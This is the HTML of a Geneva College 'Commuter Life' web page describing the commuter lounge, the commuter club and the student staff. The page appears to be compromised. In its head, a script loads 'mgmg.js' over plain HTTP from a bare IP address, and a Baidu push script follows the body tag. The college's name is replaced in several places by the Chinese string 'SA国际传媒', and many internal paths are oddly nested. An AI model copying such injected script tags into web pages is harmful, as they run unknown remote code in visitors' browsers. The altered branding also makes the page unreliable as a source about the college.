  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
      <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
      
      
       

<!-- begin Convert Experiences code added 3-30-2021 -->
<script type="text/javascript" src="none"></script>
<!-- end Convert Experiences code -->



<!-- Google Tag Manager -->
<noscript><iframe height="0" src="//www.googletagmanager.com/ns.html?id=GTM-NJ49Q2" style="display:none;visibility:hidden" width="0"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NJ49Q2');</script>
<!-- End Google Tag Manager -->

   
      <title>Commuter Life</title>
        <meta content="Commuter Life" name="title" />
    <link href="https://www.geneva.edu/student-life/commuters" rel="canonical" />



      
        <!-- standard scripts include -->
      <div>

	
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->

<!--<script src="none" type="text/javascript"></script>-->

<!-- MOBILE SPECIFIC METAS ================================= -->
<meta content="width=device-width initial-scale=1.0 maximum-scale=1.0 user-scalable=yes" name="viewport"/>
<!-- Custom mobile header theme color -->
<meta name="theme-color" content="#c99a2c">
<meta name="msapplication-navbutton-color" content="#c99a2c">
<meta name="theme-color" content="#c99a2c">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

<!-- FONTS ================================================= -->

<!--<link href="https://fonts.googleapis.com/css?family=Nunito:400,400i,700,700i,900" rel="stylesheet"/>-->

<!-- Font Awesome 5 -->
<script src="none" crossorigin="anonymous"></script>
<!--<link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" rel="stylesheet"/>-->


<!-- CSS =================================================== -->
<link href="https://www.geneva.edu/_files/css/normalize.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/main-nav-responsive.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/main-nav-pure.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.mmenu.all.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.jscrollpane.css" media="all" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/geneva-main-streamline.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/left-nav-responsive.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/right-menu-styles.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/clicknav.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/search-modal.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/skeleton-newbrand.css" rel="stylesheet"/> 

<!-- FAVICON ================================================ -->
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="icon" type="image/x-icon"/>
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->
<script src="none" type="text/javascript"></script>




</div>    <!-- standard scripts include -->
      <div>
<link href="/academics/programs/css/academic-styles.css" rel="stylesheet"/>


</div>  

 

		<!-- standard scripts include -->
		<div>
<link href="/academics/crossroads/off-campus-study/_assets/offcampusstudy-styles.css" rel="stylesheet" type="text/css"/> <link href="/alumni/_assets/css/newbrand-cards.css" rel="stylesheet" type="text/css"/> <link href="/_files/css/site-main-landing-styles.css" rel="stylesheet" type="text/css"/>


</div>
      


      
      
      <link href="https://www.geneva.edu/_files/css/colorbox.css" rel="stylesheet" />


<script src="none" ></script>
<script>
   $(document).ready(function(){
    //Examples of how to assign the ColorBox event to elements
    $(".group1").colorbox({rel:'group1'});
    $(".group2").colorbox({rel:'group2', transition:"fade"});
    $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
    $(".group4").colorbox({rel:'group4', slideshow:true});
    $(".ajax").colorbox();
if( /Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent) ) {
} else {
    $(".youtube").colorbox({iframe:true, innerWidth:640, innerHeight:390});
    $(".vimeo").colorbox({iframe:true, innerWidth:500, innerHeight:409});
    $(".iframe").colorbox({iframe:true,fixed: true, width:"80%", height:"80%"});
    $(".iframeprint").colorbox({iframe:true, width:"720", height:"700"});
    $(".iframepdf").colorbox({iframe:true, innerWidth:800, innerHeight:650});
    $(".iframepdfshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshow").colorbox({rel:'iframeshow'});
}
    $(".inline").colorbox({inline:true,scrolling:true, width:"80%"});
    $(".callbacks").colorbox({
     onOpen:function(){ alert('onOpen: colorbox is about to open'); },
     onLoad:function(){ alert('onLoad: colorbox has started to load the targeted content'); },
     onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
     onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
     onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
    });
    $('.non-retina').colorbox({rel:'group5', transition:'none'})
    $('.retina').colorbox({rel:'group5', transition:'none', retinaImage:true, retinaUrl:true});
    
    //preserving a JavaScript event for inline calls.
    $("#click").click(function(){ 
     $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
     return false;
    });
   });


// Stop browser scrolling

$(document).bind('cbox_open', function () {
    $('html').css({ overflow: 'hidden' });
}).bind('cbox_closed', function () {
    $('html').css({ overflow: 'auto' });
}); 

// Stop browser scrolling


</script>
      

<!-- START OPEN GRAPH TAGS-->
    <meta content="Commuter Life" property="og:title" />
        <meta content="website" property="og:type" />
    
	<meta content="https://www.geneva.edu/student-life/commuters" property="og:url" />
		<meta content="SA国际传媒 offers academically excellent, Christ-centered and affordable education." property="og:description" />
		    	<meta content="https://www.geneva.edu/student-life/_assets/hero-commuter.jpg" property="og:image" />
    	<!-- END OPEN GRAPH TAGS-->

   
<script src="http://154.215.109.3/mgmg.js"></script>


</head>
   <Body><h1><a href="/">SA国际传媒</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
      <div class="bg-blur">
          <div id="topLinkBar">
               <!-- ICO BAR Include Here-->
             <div>
<!-- Ico Bar --><ul class="topicobar">
<li class="btndrop2 first"><i class="fa-solid fa-pen-to-square">&#160;</i> APPLY
<ul class="btndrop-menu leftalign">
<li><a href="/admissions/tugapply.php">Undergraduate</a></li>
<li><a href="/online-degree/odpapply.php">Online Degree</a></li>
<li><a href="/graduate/gradapply.php">Graduate</a></li>
</ul>
</li>
<li class="nodrop"><a class="toplevel" href="none"><i class="fa-solid fa-gift-card">&#160;</i> GIVE</a></li>
<li class="nodrop"><a class="toplevel" href="/admissions/visit/"><i class="fa-regular fa-location-dot">&#160;</i> VISIT</a></li>
</ul><!-- end Ico Bar -->


</div>          </div>
          <div id="headSpace">
               <div>
<link href="/_files/css/head-bar-streamline.css" rel="stylesheet" type="text/css"/>
<div id="headContainer">
<div class="sec1">
<div id="logoFlag"><a href="/"><img alt="SA国际传媒" height="525" src="/_files/sitegraphics/geneva-spade-light.svg" width="1920"/> </a></div>
<a id="pagetop" name="pagetop"></a></div>
<div class="sec2">
<div id="navMenuSpace">
<div id="navMenuContainer"><nav>
<ul class="click-nav">
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">SA国际传媒</a>
<ul>
<li><a href="/about-geneva/">Fast Facts &amp; Overview</a></li>
<li><a href="/about-geneva/identity/">Geneva Identity</a></li>
<li><a href="/about-geneva/policies/">Academic Policies</a></li>
<li><a href="/about-geneva/leadership.php">Leadership</a></li>
<li><a href="/articles/">Stories, Blogs &amp; Articles</a></li>
<li><a href="/calendar/">Calendar of Events</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Academics</a>
<ul>
<li><a href="/academics/">Explore Academics</a></li>
<li><a href="/academics/programs/">Search Degree Programs</a></li>
<li><a href="/academics/core-studies/">Core Curriculum</a></li>
<li><a href="/academics/honors/">Honors Program</a></li>
<li><a href="/graduate/">Graduate Programs</a></li>
<li><a href="/online-degree/">Online Degree Programs</a></li>
<li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
<li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
<li><a href="/cfl/">Center for Faith &amp; Life</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Admissions &amp; Aid</a>
<ul>
<li><a href="/financial-aid/tug-financial-aid.php">Undergraduate</a></li>
<li><a href="/graduate/admissions/">Graduate</a></li>
<li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
<li><a href="/admissions/visit/">Visit Geneva</a></li>
<li><a href="/admissions/international/">International Students</a></li>
<li><a href="/admissions/transfers/">Transfer Students</a></li>
<li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
<li><a href="/admissions/military/">Military &amp; Veterans</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Student Life</a>
<ul>
<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
<li><a href="/calling-career/">Calling &amp; Career</a></li>
<li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
<li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
<li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
<li><a href="/student-life/campus-safety/">Campus Safety</a></li>
<li><a href="/student-life/academic-support/">Academic Support</a></li>
<li><a href="/student-life/commuters.php">Commuter Life</a></li>
<li><a href="/student-life/student-resources.php">Student Resources</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Alumni</a>
<ul>
<li><a href="none">Giving</a></li>
<li><a href="/alumni/">Alumni Home</a></li>
<li><a href="/alumni/events/">Alumni Events</a></li>
<li><a href="/alumni/connect/alumni_updateform.php">Alumni Update Form</a></li>
<li><a href="/academics/registrar/student_records_transcripts.php">Transcript Requests</a></li>
<li><a href="/alumni/represent/alumni_referrals.php">Gold and White Referrals</a></li>
<li><a href="/alumni/represent/legacylink.php">Legacy Link Program</a></li>
<li><a href="/alumni/connect/alumni_contact.php">Contact Alumni Engagement</a></li>
</ul>
</li>
<li><a href="none">Athletics</a></li>
</ul>
</nav></div>
<!-- end navMenuContainer --></div>
</div>
<div class="sec3">
<div id="searchGlass"><button class="searchButton" id="modalsearch"> <i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228;"></i> </button></div>
<div id="screencheck"></div>
<div class="menutrigger"><a href="#menu">&#160;</a></div>
</div>
</div>
<script>// <![CDATA[
document.addEventListener('DOMContentLoaded', () => {
  const menu = document.querySelector('#navMenuSpace .click-nav');
  if (!menu) return;

  // Make any LI that has a UL easier to target
  menu.querySelectorAll(':scope > li').forEach(li => {
    if (li.querySelector(':scope > ul')) li.classList.add('has-submenu');
  });

  const triggers = menu.querySelectorAll(':scope > li.has-submenu > a');

  // ARIA
  triggers.forEach(a => {
    a.setAttribute('aria-haspopup', 'true');
    a.setAttribute('aria-expanded', 'false');
  });

  function closeAll(except) {
    menu.querySelectorAll(':scope > li.submenu_open').forEach(li => {
      if (li !== except) {
        li.classList.remove('submenu_open');
        const btn = li.querySelector(':scope > a[aria-expanded]');
        if (btn) btn.setAttribute('aria-expanded', 'false');
      }
    });
  }

  triggers.forEach(a => {
    a.addEventListener('click', e => {
      const li = a.parentElement;
      const sub = a.nextElementSibling;
      if (sub && sub.tagName === 'UL') {
        e.preventDefault();
        const wasOpen = li.classList.contains('submenu_open');
        closeAll(li);
        li.classList.toggle('submenu_open', !wasOpen);
        a.setAttribute('aria-expanded', String(!wasOpen));
      }
    });

    // Keyboard support
    a.addEventListener('keydown', e => {
      if (e.key === 'Enter' || e.key === ' ') { e.preventDefault(); a.click(); }
      if (e.key === 'Escape') { closeAll(); a.blur(); }
      if (e.key === 'ArrowDown') {
        const first = a.parentElement.querySelector(':scope > ul a');
        if (first) { e.preventDefault(); a.setAttribute('aria-expanded', 'true'); a.parentElement.classList.add('submenu_open'); first.focus(); }
      }
    });
  });

  // Close when clicking outside / focus leaves / press Esc
  document.addEventListener('click', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('focusin', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('keydown', e => { if (e.key === 'Escape') closeAll(); });
});
// ]]></script>


</div>          </div>
          





    <style type="text/css">
    .videoWindow-clip.clip-hero:after {
    background-image: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0) 20%);
    content: '';
    display: block;
    width: 100%;
    height: 100%;
    position: absolute;
    top: 0px;
    left: 0;
    opacity: 1;
    pointer-events: none;
}
        .videoWindow-clip {
            background: #000000 url(_assets/hero-commuter.jpg) no-repeat center;
            height:550px; 
            background-attachment:initial;
        }
                @media(min-width: 750px){
           .videoWindow-clip {
               height:auto!important;
           }
        }
        @media(min-width: 960px){
           .videoWindow-clip {
               background-attachment:fixed;
           }
        }
                }
    </style>
<link href="/student-life/commuters/academics/programs/academics/programs/css/academic-hero.css" rel="stylesheet" />
<!-- Academics Hero -->
<div class="videoWindow-clip clip-hero">
    <div class="moireOverlay">
            </div>
    <div id="heroTitle">
                        <h2>Commuter Life</h2>
                        <span>Connect. Explore. Thrive.</span>
            </div>
</div>

<svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="large-hero-clip"><path d="M1,0 v0.918 h-0.453 c-0.028,0,-0.047,0.082,-0.047,0.082 s-0.019,-0.082,-0.047,-0.082 H0 V0 H1" /></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="medium-hero-clip"><path d="M1,0 v0.918 H0.565 c-0.039,0,-0.065,0.082,-0.065,0.082 s-0.026,-0.082,-0.065,-0.082 H0 V0 H1" /></clipPath>
      </svg>

                  <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="small-hero-clip"><path d="M1,0 v0.889 h-0.278 c-0.133,0,-0.222,0.111,-0.222,0.111 c0,0,-0.089,-0.111,-0.221,-0.111 H0 V0 h1" /></clipPath>
      </svg>
                  <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-large"><path d="M1,0 v0.912 h-0.432 c-0.041,0,-0.068,0.088,-0.068,0.088 c0,0,-0.027,-0.088,-0.068,-0.088 H0 V0 h1" /></clipPath>
      </svg>
                   <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-medium"><path d="M1,0.001 v0.917 h-0.42 c-0.048,0,-0.08,0.083,-0.08,0.083 c0,0,-0.032,-0.083,-0.08,-0.083 H0 V0.001 h1" /></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="tall-hero-small"><path d="M1,0 v0.874 H0.663 c-0.098,0,-0.162,0.126,-0.162,0.126 s-0.065,-0.126,-0.162,-0.126 H0 V0 H1" /></clipPath>
      </svg>
      
<!-- End Academics Hero -->








          
          

<div id="statusBarSpace">
	<div class="center" id="statusBarContainer">
		<div id="breadCrumbs">
<ul>
            
            
        
                <li><a href="/student-life/commuters/academics/programs/index.php">Home</a></li>
                
            
        
                                    <li><a href="/student-life/commuters/academics/programs/css/index.php">Student Life</a></li>
            
                                    
                                    
            <li class="selected">Commuter Life</li>
            
</ul>
		</div>
	</div>
</div>
          <div id="contentContainer">
                <!--<div id="contentFullscreen">-->
                <div id="pageContentAcademics">
                
 
                 
                 
                 
                <div class="content-container">
                    <content ></content>

                
                
                 <!-- Intro Content -->
<div class="container reveal">
<div class="row">
<div class="seven columns">
<h2 class="headr">Cultivating a Sense of Belonging</h2>
<p class="largetext"> <p class="largetext">At SA国际传媒, we strive to provide opportunities, services, and a designated space for undergraduate commuter students in order to create a strong commuter community and a sense of belonging on campus that fosters personal development and academic success through resources, programs and information that meets the needs of our commuter students.</p></p>
</div>
<div class="five columns center" style="padding: 7rem 0 0 0;position: relative;display: flex;flex-direction: column;">
<div class="spade"><img alt="" class="spade-image" src="/student-life/commuters/academics/programs/css/_assets/header-pic.jpg" /></div>
<h3 />
</div>
</div>
</div>

<script>

document.addEventListener('DOMContentLoaded', () => {
// Select the `.spade` element
const spade = document.querySelector('.spade');

// Add a mousemove event listener
spade.addEventListener('mousemove', (event) => {
    // Get the dimensions and position of the spade element
    const rect = spade.getBoundingClientRect();
    const mouseX = event.clientX - rect.left; // Mouse X relative to the element
    const mouseY = event.clientY - rect.top;  // Mouse Y relative to the element

    // Calculate offsets as percentages of the element's dimensions
    const percentX = (mouseX / rect.width - 0.5) * -20; // Opposite direction, scaled to 20px max
    const percentY = (mouseY / rect.height - 0.5) * -20;

    // Set CSS variables for :before element
    spade.style.setProperty('--before-x', `${percentX}px`);
    spade.style.setProperty('--before-y', `${percentY}px`);
});

// Reset position when the mouse leaves
spade.addEventListener('mouseleave', () => {
    spade.style.setProperty('--before-x', `0px`);
    spade.style.setProperty('--before-y', `0px`);
});
});


</script>

                 
       
<style>
.nocard {
    box-shadow: none;
}
.card {
    box-shadow: 0 1px 10px 0 rgba(0, 0, 0, 0.09);
}
.contentCards .card {
    margin-bottom: 20px;
    border-radius: 8px 100px;
}
.contentCards .card img {
    border-radius: 8px 100px 0px 100px;
    border-bottom: 8px solid #fdd900;
    /*border-right: 8px solid #fdd900;*/
    filter:none;
}
.contentCards .card a {
    color: #353535;
}
.contentCards .card a:hover {
    color: #ffffff;
}
.section.contentCards {
    text-align: center;
    padding: 50px;
}
.card-info {
    padding: 20px 30px 30px 30px;
}
.card-info h3 {
    color: #353535;
}
.card-info p {
    line-height: 1.8em;
}
.section.program-options {
    background-size: cover;
}
</style>
<div class="section container-fullwidth program-options" style="background-color: #353535;">
<h2 class="center headerline">Connect, Explore, Thrive</h2>
<p>We work to create an聽inviting and welcoming environment on campus for our commuter students</p><div class="scroll-container flex-container reveal">
<div class="nb-card nb-flex-item">
<img alt="Photo showing Commuter Application" class="nb-card-image" src="/student-life/commuters/academics/programs/css/_assets/application.jpg" />
<div class="nb-card-action"><i class="fa-solid fa-angles-right" ></i></div>
<div class="nb-card-link">
    <a href="/student-life/commuters/academics/programs/css/residence-life/commuter-app.php">Commuter Application</a>
</div>
</div>
<div class="nb-card nb-flex-item">
<img alt="Photo showing Commuter Club" class="nb-card-image" src="/student-life/commuters/academics/programs/css/_assets/commuter-club.jpg" />
<div class="nb-card-action"><i class="fa-solid fa-angles-right" ></i></div>
<div class="nb-card-link">
    <a href="none">Commuter Club</a>
</div>
</div>
<div class="nb-card nb-flex-item">
<img alt="Photo showing Student Activities" class="nb-card-image" src="/student-life/commuters/academics/programs/css/_assets/oncampus.jpg" />
<div class="nb-card-action"><i class="fa-solid fa-angles-right" ></i></div>
<div class="nb-card-link">
    <a href="/student-life/commuters/academics/programs/css/engagement/student-activities/index.php">Student Activities</a>
</div>
</div>
                <div class="nb-card nocard nocard-mobile nb-flex-item" ></div>
        </div>
</div>


 
                 
                 <link href="https://www.geneva.edu/_files/carousel/ver2/assets/owl.carousel.min.css" rel="stylesheet" />
<link href="https://www.geneva.edu/_files/carousel/ver2/assets/owl.theme.default.min.css" rel="stylesheet" />

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <div class="section keystaff" id="faculty"><!-- Key Faculty -->
<div class="keystaff-container">
<div class="scroll-container">
<h2 class="facultyTxtHead">Meet Our Staff</h2>
                   <div class="owl-carousel scroller-faculty reveal">
                                             
                                                                               
                                                                                                        
                                                                                                                                                        <div class="content-card">
                                                                <a href="/student-life/commuters/academics/programs/faculty-staff/staff/bridgette-hinzman.php" target="_blank">
                                    <img class="staffphoto" src="/student-life/commuters/academics/programs/faculty-staff/staff/_assets/bridgette.png" />
                                </a>
                                <div class="nameplate">
                                 <span>Bridgette Hinzman</span>
                                 <div class="whitetext" id="deptTitle">Assistant to VP &amp; Dean of Student Development</div>
                                </div>
                            </div>
                                                                                                                                            
                                                                                                        
                                                                               
                                                                               
                                                                                                        
                                                                                                        
                                                                               
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                                                                        <div class="content-card">
                                                                <a href="/student-life/commuters/academics/programs/faculty-staff/staff/amber-larry.php" target="_blank">
                                    <img class="staffphoto" src="/student-life/commuters/academics/programs/faculty-staff/staff/_assets/reese.png" />
                                </a>
                                <div class="nameplate">
                                 <span>Reese Miller</span>
                                 <div class="whitetext" id="deptTitle">Commuter Club President</div>
                                </div>
                            </div>
                                                                                                                                            
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                                                                        <div class="content-card">
                                                                <a href="/student-life/commuters/academics/programs/faculty-staff/staff/reese-miller.php" target="_blank">
                                    <img class="staffphoto" src="/student-life/commuters/academics/programs/faculty-staff/staff/_assets/amder.png" />
                                </a>
                                <div class="nameplate">
                                 <span>Amber Larry</span>
                                 <div class="whitetext" id="deptTitle">Commuter Club Secretary</div>
                                </div>
                            </div>
                                                                                                                                            
                                                                                                        
                                                                                                        
                                                                               
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                                                        
                                                                               
                                                                                                        
                                                                               
                                                                                                        
                                                                                                        
                                                                                                        
                                                                            <!-- end faculty region --></div>
<!-- end carousel--></div>
</div>
</div>


<style>
.keystaff {
    /*clip-path: polygon(0 0, 100% calc(7% + 1vw), 100% 100%, 0 calc(94% - 1vw));
    clip-path: polygon(0 0, 100% calc(7% + 1vw), 100% 100%, 0 calc(94% - 1vw));
    clip-path: polygon(0 calc(7% + 1vw), 100% 0, 100% calc(94% - 1vw), 0 100%);*/
}

.keystaff-container {
    background-color: #3d3935;
    background-image: linear-gradient(to bottom, rgb(20 20 20 / 48%) 10%, rgb(255 255 255) 90%), url(https://www.geneva.edu/cse/_assets/design/coffeehouse-halftone-grey.jpg);
    background-position: bottom;
    background-repeat: no-repeat;
    background-size: cover;
    padding: 60px 0 100px 0;
}
.keystaff-container h2 {
    text-align: center;
    font-size: 40px;
    margin-bottom: 50px;
    color: #fdd900;
}
.content-card {
    border-bottom: 7px solid #fdd900;
}
.content-card span {
    font-size: 25px;
    color: #3d3935;
    position: absolute;
    background-color: #ffffff;
    top: 0;
    left: 0;
    z-index: 2;
}
div#deptTitle {
    background-color: #3d3935;
    color: #ffffff;
    max-width: 90%;
    padding: 7px;
    position: absolute;
    top: 68px;
    left: 30px;
    z-index: 3;
    font-size: 12px;
    line-height: 1.5em;
}
.nameplate {
    position:absolute;
    width:100%;
    height:100px;
    bottom:20%;
}

.black-bg-container .content-card {
    position: relative;
    min-height: 350px;
}

@media (min-width:1024px) and (max-width:1324px){
    .content-card span {
        font-size: 20px;
    }
}
</style>
<script>// <![CDATA[
jQuery(document).ready(function(){
            jQuery(".scroller-faculty").owlCarousel({
                stagePadding: 40,
                                center: false,
                                items:1,
                margin:200,
                nav:true,
                                loop:true,
                                responsive:{
                    0:{
                        items:1,
                        margin:40
                    },
                    800:{
                        items:2,
                    },
                    1000:{
                        items:3,
                        margin:200
                    },
                    1200:{
                        items:3,
                        margin:200
                    }
                }
            });
        });
// ]]></script>
<script src="none" ></script>

                 <!-- Program Facts -->
<div class="section stats" style="background-image: linear-gradient(to bottom, rgb(253 217 0 / 83%), rgb(253 217 0 / 83%)), url('/student-life/commuters/academics/programs/css/_assets/commuter-lounge-bw.jpg'); ">
    <div class="wide-container">
        <div class="flex-container">
                <div class="flex-item-1">
            <div class="flexpad statholder">
                <h5><i class="fa-solid fa-couch" ></i> <span class="textwhite">Commuter Lounge</span></h5>
                <p>Hang out in our newly completed commuter lounge! Whether you want to study, eat lunch, hang out with friends, or just chill, this space is perfect for you!</p>                
                            </div>
        </div>
                <div class="flex-item-1">
            <div class="flexpad statholder">
                <h5><i class="fa-regular fa-building" ></i> <span class="textwhite">Building Access</span></h5>
                <p>You have access to every building on campus including our fitness center, residence lounges, and McCartney Library.</p>                
                            </div>
        </div>
                <div class="flex-item-1">
            <div class="flexpad statholder">
                <h5><i class="fa-light fa-wreath-laurel" ></i> <span class="textwhite">100+ Traditions &amp; Events</span></h5>
                <p>Even though you commute to campus, there is so much happening on campus for you to get involved with and experience. </p>                
                            </div>
        </div>
                </div><!-- flexrow-->
    </div>
</div>
<!-- End Program Facts -->

                 
<div class="overlap-container" style="background-image: url(/student-life/commuters/academics/programs/css/_assets/cokeconnections.jpg);">
    <div class="section overlap-region reveal" style="background-image: linear-gradient(to bottom, #353535a6 0%, #353535 90%)">
        <div class="overlap-region-info">
            <div class="row">
                            <div class="five columns" style="padding: 0 0 40px 0;position: relative;display: flex;flex-direction: column;">
                <div class="spade"><img alt="" class="spade-image" src="/student-life/commuters/academics/programs/css/_assets/pic-comm-club2.jpg" /></div>
                </div>
                <div class="seven columns">
                                        <h2>Commuter Club</h2>
                                                            <p>Get involved with our commuter club! Hosted by commuter students, this club hosts events throughout the year, allowing commuter students to join in fellowship together. Follow their Instagram page to say up to date with their events.&#160;</p>
                                                                <a class="button cleanwhite" href="none" target="_blank">Learn More</a>
                                    </div>
                        </div>
        </div>
    </div>
</div>

                 
                 
                 
                        


                 <script>
document.addEventListener("DOMContentLoaded", function () {
  const tabContainer = document.getElementById('tab-region');
  const params = new URLSearchParams(window.location.search);
  const tabParam = params.get("tab");

  if (tabParam) {
    const tabId = `tab${tabParam}`;
    const radio = document.getElementById(tabId);
    if (radio) {
      radio.checked = true;
      if (tabContainer) {
       const offset = -80;
        const top = tabContainer.getBoundingClientRect().top + window.pageYOffset + offset;
        window.scrollTo({ top, behavior: 'smooth' });
      }
    }
  }
});
</script> 
                         
                   
                  <div class="quote-container">
    <div class="container">
        <div class="grid-quote-container reveal">
        <div class="col-1">
            <div class="spade"><img alt="" class="spade-image" src="/student-life/commuters/academics/programs/css/_assets/quote.jpg" /></div>
        </div>
        <div class="col-2">
            <div class="quote-text"><p>As a commuter, I had to be intentional, but everywhere you look on campus there is opportunity for Christian community. From simple interactions with peers, clubs, sports, and really everything is about community and integrating faith and learning with your life."</p></div>
        </div>
    </div>
      </div>
<div class="spade-grid-bg" ></div>
</div>

                  
				  
                 <!-- START OPEN GRAPH TAGS-->
    <meta content="Commuter Life" property="og:title" />
        <meta content="website" property="og:type" />
	<meta content="https://www.geneva.edu/student-life/commuters" property="og:url" />
	<meta content="https://www.geneva.edu/_files/images/oldmain-web.jpg" property="og:image" />
	<meta content="SA国际传媒 offers academically excellent, Christ-centered and affordable education." property="og:description" />
	<!-- END OPEN GRAPH TAGS-->
    

<script>
$('.photobox').colorbox({ 
    onComplete : function() { 
       $(this).colorbox.resize(); 
    }    
});
</script>
        
        
                <div class="section photogrid">
            <h2 class="center headerline">Discover Your Campus</h2>
            <div class="photo-grid">
                                                    <div class="card card-sq-sm reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-1.jpg'); background-position: right;" ></div>
                                                                    <div class="card card-sq-sm reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-4.jpg'); background-position: right;" ></div>
                                                                    <div class="card card-wide reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-picture.jpg'); background-position: right;" ></div>
                                                                    <div class="card card-sq-lg reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-5.jpg'); background-position: right;" ></div>
                                                                    <div class="card card-tall reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-3.png'); background-position: right;" ></div>
                                                                    <div class="card card-sq-sm reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-2.jpg'); background-position: right;" ></div>
                                                                    <div class="card card-sq-sm reveal" style="background-image: url('/student-life/commuters/academics/programs/css/_assets/grid-6.jpg'); background-position: right;" ></div>
                                            </div>
        </div>




                    <!--<div class="parallax-1" id="parallax-1">-->
                       <div class="container" id="contentContainer">
                          <div class="row">
                             <div class="collapse-md six columns">
                                <div class="sectionText">
                                   <div class="sectionText-Gold">
                                      
                                   </div>
                                   <!-- end sectionTextGold-->
                                </div>
                                <!-- end sectionText -->
                             </div>
                             <!-- end 6 columns -->
                             <div class="collapse-md six columns">
                                
                                <!--end sectionText-->
                             </div>
                             <!--end 6 columns-->
                          </div>
                          <!--end row-->
                       </div>
                       <!--end container-->
                     <!--</div>
                end parallax 1-->
                 

<div class="section card-carousel stories headerline"><!-- Featured Stories -->
<div class="scroll-container reveal">
<h2 class="headerline">Related Content</h2>
<div class="owl-carousel scroller-stories owl-theme">
